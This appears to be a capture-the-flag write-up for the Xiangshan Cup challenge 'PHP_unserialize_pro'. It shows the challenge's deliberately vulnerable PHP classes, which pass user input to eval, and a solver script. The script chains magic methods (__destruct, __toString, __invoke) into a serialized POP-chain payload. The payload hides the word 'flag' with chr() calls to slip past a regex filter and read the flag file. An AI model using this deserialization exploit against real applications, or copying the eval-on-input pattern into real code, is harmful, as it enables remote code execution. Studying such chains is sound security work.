香山杯

PHP_unserialize_pro

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<?php
class Welcome
{
    public $name='A_G00d_H4ck3r';
    public $arg = 'welcome';

//    public function __construct()
//    {
//        $this->name = 'Wh0 4m I?';
//    }

​    public function __destruct()
​    {
​        if ($this->name == 'A_G00d_H4ck3r') {
​            echo "1".$this->arg='1';
​        }
​    }
}

class G00d{
    public $shell;
    public $cmd;
    public function __invoke(){
        $shell = $this->shell;
        $cmd = $this->cmd;
        if(preg_match('/f|l|a|g|\*|\?/i', $cmd)){
            die("U R A BAD GUY");
        }
        eval($shell($cmd));
    }
}

class H4ck3r
{
    public $func;

​    public function __toString()
​    {
​        $function = $this->func;
​        return $function();
​    }
}
$a=new Welcome();
$a->name=new H4ck3r();
$a->name->func=new G00d();
$a->name->func->shell='strtolower';
$a->name->func->cmd='show_source(chr(47).chr(102).chr(49).chr(97).chr(103));';
echo serialize($a);